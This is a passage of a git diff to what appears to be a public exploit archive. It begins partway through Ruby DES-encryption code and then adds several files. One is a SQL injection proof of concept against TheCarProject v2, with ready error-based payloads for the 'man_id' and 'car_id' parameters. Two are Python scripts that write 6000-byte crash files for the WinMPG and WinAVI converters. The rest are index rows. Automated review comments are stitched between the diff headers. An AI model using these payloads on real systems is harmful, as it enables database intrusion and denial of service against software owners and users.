v6 |= 0x4000000 + end + if (v3 & 0x100) != 0 + v6 |= 0x8000000 + end + if (v4 & 0x10000) != 0 + v6 |= 0x10000000 + end + if (v3 & 0x10000) != 0 + v6 |= 0x20000000 + end + if (v4 & 0x1000000) != 0 + v6 |= 0x40000000 + end + if (v3 & 0x1000000) != 0 + v6 |= 0x80000000 + end + + # Create return tuple + ret_block = Array.new + ret_block.push v5 + ret_block.push v6 + ret_block + end + + def load(a1) + a2 = Array.new(8, 0) + v3 = a1 + a2[0] = a1 & 0xff + v3 >>= 3 + a2[1] = v3 & 0xff + v3 >>= 4 + a2[2] = v3 & 0xff + v3 >>= 4 + a2[3] = v3 & 0xff + v3 >>= 4 + a2[4] = v3 & 0xff + v3 >>= 4 + a2[5] = v3 & 0xff + v3 >>= 4 + a2[6] = v3 & 0xff + v3 >>= 4 + a2[7] = v3 & 0xff + a2[0] = (a2[0] * 2) & 0xff + a2[7] |= (16 * a2[0]) & 0xff + v3 >>= 4 + a2[0] |= v3 & 0xff + + data_block = a2.pack("c*").unpack("V*") + data_block[0] &= 0x3F3F3F3F + data_block[1] &= 0x3F3F3F3F + data_block + end + + def desx(data_block, ksch, idx) + ksch = ksch.pack("V*") + ksch = ksch.unpack("Q<*") + key_block = ksch[idx] + + data_block_ptr = data_block.pack("V*") + data_block_ptr = data_block_ptr.unpack1("Q<*") + data_block_ptr ^= key_block + + 
counter = 1 + data_block_byte_ptr = [data_block_ptr].pack('Q<') + left = SBOXES[data_block_byte_ptr[0].ord] + right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] + + # Create return tuple + ret_block = Array.new + ret_block.push left + ret_block.push right + ret_block + + end + + def store(data_block) + a1 = data_block.pack("V*") + val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1 + val & 0xffffffff + end + + def sbox_xors(data_block_in, ksch_arg, decrypt_flag) + + decrypt_flag_cpy = decrypt_flag + if (decrypt_flag & 0x100) != 0 + data_block_0 = data_block_in + else + data_block_0 = rotate_block_init(data_block_in) + end + + encrypt_flag = (decrypt_flag_cpy & 1) == 0 + ti_block_0 = load(data_block_0[0]) + ti_block_1 = load(data_block_0[1]) + + for i in 0..15 + ti_cpy = ti_block_1 + if 
encrypt_flag + ti_block_1 = desx(ti_block_1, ksch_arg, i) + else + ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i) + end + ti_block_1[0] ^= ti_block_0[0] + ti_block_1[1] ^= ti_block_0[1] + ti_block_0 = ti_cpy + end + + data_block_0[0] = store(ti_block_1) + data_block_0[1] = store(ti_block_0) + + if (!(decrypt_flag_cpy & 0x200) != 0) + rotate_block_final(data_block_0) + else + data_block_0 + end + + end + + def gen_key_unchecked(key) + + idx = 0 + key_arr = key.unpack("V*") + key_sch = Array.new + for i in 0..15 + idx += ROTATIONS[i].ord + v6 = 0 + v5 = 0 + v14 = 0 + for j in 0..47 + pc2_p1 = (idx + PC2[j].ord) % 0x1C + if PC2[j].ord > 0x1B + pc2_p2 = 0x1c + else + pc2_p2 = 0 + end + v13 = PC1[pc2_p1 + pc2_p2].ord + if v13 <= 31 + v12 = 0 + else + v12 = 1 + v13 -= 32 + end + if j <= 23 + v10 = j + else + v14 = 1 + v10 = j - 24 + end + v11 = 8 * (v10 / 6) + v10 % 6 + key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13] + + if (key_and != 0) + if v14 == 1 + v6 |= SBOX_BYTE_ORDER[v11] + else + v5 |= SBOX_BYTE_ORDER[v11] + end + end + end + key_sch.push v5 + key_sch.push v6 + end + key_sch + end + + def des_string_to_key(key_buf_str) + + des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0) + des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1) + + temp_key1 = Array.new(8, 0) + temp_key2 = Array.new(8, 0) + + key_buf_bytes = key_buf_str.unpack("c*") + + counter = 0 + key_buf_str_len = key_buf_bytes.length - 1 + for i in 0..key_buf_str_len + counter %= 8 + temp_key1[counter] |= key_buf_bytes[i] + temp_key2[counter] |= key_buf_bytes[i] + + data_block = temp_key1.pack("c*").unpack("V*") + temp_key1 = sbox_xors(data_block, des_keysch_0, 0) + temp_key1 = temp_key1.pack("V*").unpack("c*") + + data_block = temp_key2.pack("c*").unpack("V*") + temp_key2 = sbox_xors(data_block, des_keysch_1, 0) + temp_key2 = temp_key2.pack("V*").unpack("c*") + counter += 1 + end + + # Prepare the return array + ret_key = Array.new(8, 0) + for j in 0..7 + ret_key[j] = temp_key2[j] ^ temp_key1[j] + end + 
ret_key.pack("c*")
+ end
+
+ def des_cbc(input_buf, key_sch, iv, decrypt_flag)
+
+ output_block_arr = Array.new
+ blocks = input_buf.unpack("Q<*")
+ for i in 0..blocks.length - 1
+
+ current_block = blocks[i]
+ if decrypt_flag == 1
+ cur_block = current_block
+ else
+ current_block ^= iv
+ end
+
+ current_block_tuple = [current_block].pack("Q<").unpack("V*")
+ output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag)
+ output_block = output_block_tuple.pack("V*").unpack1("Q<")
+ output_block_arr.push output_block
+
+ if decrypt_flag == 1
+ output_block ^= iv
+ iv = cur_block
+ else
+ iv = output_block
+ end
+ end
+
+ output_block_arr.pack("Q<*")
+
+ end
+
+ def des_crypt_func(binary_buf, key_buf, decrypt_flag)
+ des_key = des_string_to_key(key_buf)
+ des_keysch = gen_key_unchecked(des_key)
+
+ temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0)
+ binary_buf_str = binary_buf.unpack('c*')
+
+ for j in 0..binary_buf_str.length - 1
+ temp_enc_buf[j] = binary_buf_str[j]
+ end
+
+ temp_enc_buf = temp_enc_buf.pack('c*')
+ output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag)
+ output_buf
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/46555.txt b/exploits/php/webapps/46555.txt
new file mode 100644
index 000000000..e658b1c2b
--- /dev/null
+++ b/exploits/php/webapps/46555.txt
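Review bot: In `get_target_os` the `VER` branch is unreachable: `String#strip!` returns `nil` when it changes nothing, so after `if val[0].strip! == "T"` has already stripped the key in place (or found nothing to strip), the second call in `elsif val[0].strip! == "VER"` always yields `nil` and `ver` is never set. Strip once before comparing, `key = val[0].strip`, then `if key == "T"` / `elsif key == "VER"`. The format guard just above it, `if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}"`, only rejects a reply when all three checks fail at once; `||` is what the check means, and the same applies to the `PEM_MSG` guard in `get_cmd_output`. Separately, `cleanup` calls `@inflater.close` and `@deflater.close` unconditionally, but those instance variables are only assigned inside `exploit` (the class-body `@deflater = nil` / `@inflater = nil` set class-level ivars, not the instance's), so if cleanup runs after an early failure such as `connect` raising, the `NoMethodError` on nil masks the original error; `@inflater&.close` / `@deflater&.close` avoids that.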
@@ -0,0 +1,83 @@
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+ built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+ unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : man_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+ built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+ unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : car_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+ built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+ unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : man_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/windows/dos/46553.py b/exploits/windows/dos/46553.py
new file mode 100755
index 000000000..bb7507691
--- /dev/null
+++ b/exploits/windows/dos/46553.py
@@ -0,0 +1,29 @@
+# Exploit Title: WinMPG Video Convert Local Dos Exploit
+# Date: 15.03.2019
+# Vendor Homepage:http://www.winmpg.com
+# Software Link: http://www.winmpg.com/down/WinMPG_VideoConvert.zip
+# Exploit Author: Achilles
+# Tested Version: 9.3.5 and older ones
+# Tested on: Windows XP SP3 EN
+
+
+# 1.- Run python code :WinMPG.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open WinMPG.exe and Click 'ALL-AVI'
+# 4.- In the new Window click Register
+# 5.- Paste the content of EVIL.txt into the Field: 'Name and Registration Code'
+# 6.- Click 'Register'and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46554.py b/exploits/windows/dos/46554.py
new file mode 100755
index 000000000..6e885dd91
--- /dev/null
+++ b/exploits/windows/dos/46554.py
@@ -0,0 +1,28 @@
+# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
+# Date: 16.03.2019
+# Vendor Homepage:http://www.winavi.com
+# Software Link: http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
+# Exploit Author: Achilles
+# Tested Version: 4.4.2
+# Tested on: Windows XP SP3 EN
+# Windows 7 x64 Sp1
+
+
+# 1.- Run the python script, it will create a new file with the name "Evil.avi"
+# 2.- Open WinAVI.exe and Click 'Convert to iPhone'
+# 3.- Load the file "Evil.avi"
+# 4.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.avi","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 83a2558e1..11f3faf0a 100644
--- a/files_exploits.csv
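Review bot: The bare `except:` that closes the try block swallows every exception, including KeyboardInterrupt and SystemExit, and the fixed "File cannot be created" message hides the real cause; catching `IOError` (this is Python 2 code, given the print statements) and letting a context manager handle the close is the usual shape: `with open("Evil.txt", "w") as f:` / `    f.write(buffer)`. The `#!/usr/bin/env python` line sits after the comment header rather than on line 1, so it is an ordinary comment and does not make the script directly executable. The step-2 and step-5 comments refer to `EVIL.txt` while the code writes `Evil.txt`, which is a different name on case-sensitive filesystems. The same bare `except:`, misplaced shebang and Python 2 print syntax appear in the 46554.py hunk.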
+++ b/files_exploits.csv
@@ -6356,6 +6356,8 @@ id,file,description,date,author,type,platform,port
 46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
 46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
 46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
+46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows,
+46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17255,6 +17257,7 @@ id,file,description,date,author,type,platform,port
 46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
 46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
 46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
+46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40995,3 +40998,4 @@ id,file,description,date,author,type,platform,port
 46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
 46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
 46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
+46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
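Review bot: The description in the added 46556 row repeats a word: `"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)"`; the neighbouring rows use a single noun phrase after the dash, so it should read `"BMC Patrol Agent - Privilege Escalation Code Execution (Metasploit)"`. This column is what the index renders in listings and search results, so the duplicate is user-visible.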